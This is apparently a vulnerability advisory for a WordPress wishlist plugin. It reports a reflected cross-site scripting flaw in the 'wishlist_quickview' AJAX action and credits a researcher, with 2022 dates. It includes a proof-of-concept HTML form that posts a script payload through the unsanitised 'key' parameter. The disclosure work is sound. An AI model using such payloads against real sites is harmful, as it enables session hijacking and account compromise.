The plugin does not sanitise and escape the key parameter before outputting it back in the wishlist_quickview AJAX action's response (available to any authenticated user), leading to a Reflected Cross-Site Scripting
<html> <form action="https://example.com/wp-admin/admin-ajax.php?action=wishlist_quickview" method="POST"> <input type="text" name="key" value='<script>alert(/XSS/);</script>'> <input type="submit" value="Send"> </form> </html> The source and destination should use the https:// protocol for the exploit to work on Chrome.
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-01 (about 11 months ago)
2022-03-01 (about 11 months ago)
2022-04-08 (about 9 months ago)